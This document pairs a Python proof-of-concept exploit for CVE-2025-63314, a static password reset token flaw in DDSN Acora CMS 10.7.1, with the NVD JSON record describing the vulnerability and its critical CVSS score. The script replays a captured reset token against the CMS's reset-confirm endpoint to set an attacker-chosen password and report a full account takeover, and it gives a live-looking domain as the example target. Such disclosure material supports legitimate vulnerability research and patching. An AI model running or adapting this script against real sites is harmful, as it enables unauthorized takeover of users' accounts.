CVE-2025-63314

#!/usr/bin/env python3 """ CVE-2025-63314 PoC - DDSN Acora CMS Static Password Reset Token This PoC demonstrates the replay attack vulnerability in Acora CMS password reset function. """ import requests import sys from urllib.parse import urljoin def exploit_account_takeover(target_url, email, reset_token): """ Perform account takeover via replay attack on password reset token Args: target_url: Base URL of Acora CMS email: Target user email reset_token: Intercepted static password reset token """ # Step 1: Request password reset (to obtain token - in real attack, this would be intercepted) reset_url = urljoin(target_url, '/api/password/reset') reset_data = {'email': email} # Step 2: Replay the static token to set new password exploit_url = urljoin(target_url, '/api/password/reset/confirm') exploit_data = { 'email': email, 'token': reset_token, # Static token can be reused 'new_password': 'Pwned123!@#' } try: response = requests.post(exploit_url, json=exploit_data, timeout=10) if response.status_code == 200 and 'success' in response.text.lower(): print(f'[+] SUCCESS: Account takeover completed for {email}') print(f'[+] New password set: Pwned123!@#') return True else: print(f'[-] FAILED: {response.status_code} - {response.text}') return False except requests.exceptions.RequestException as e: print(f'[-] ERROR: {e}') return False def main(): if len(sys.argv) < 4: print(f'Usage: {sys.argv[0]} <target_url> <email> <reset_token>') print(f'Example: {sys.argv[0]} http://acoracms.com [email protected] abc123static') sys.exit(1) target = sys.argv[1] email = sys.argv[2] token = sys.argv[3] exploit_account_takeover(target, email, token) if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-63314", "sourceIdentifier": "[email protected]", "published": "2026-01-12T17:15:52.180", "lastModified": "2026-01-22T22:02:45.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A static password reset token in the password reset function of DDSN Interactive Acora CMS v10.7.1 allows attackers to arbitrarily reset the user password and execute a full account takeover via a replay attack."}, {"lang": "es", "value": "Un token estático de restablecimiento de contraseña en la función de restablecimiento de contraseña de DDSN Interactive Acora CMS v10.7.1 permite a los atacantes restablecer arbitrariamente la contraseña del usuario y ejecutar una toma de control completa de la cuenta mediante un ataque de repetición."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-640"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ddsn:cm3_acora_cms:10.7.1:*:*:*:*:*:*:*", "matchCriteriaId": "78A1FFF8-C0FE-4AA4-B6D0-E8D3C8EAE6BF"}]}]}], "references": [{"url": "http://acora.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://ddsn.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/padayali-JD/CVE-2025-63314", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}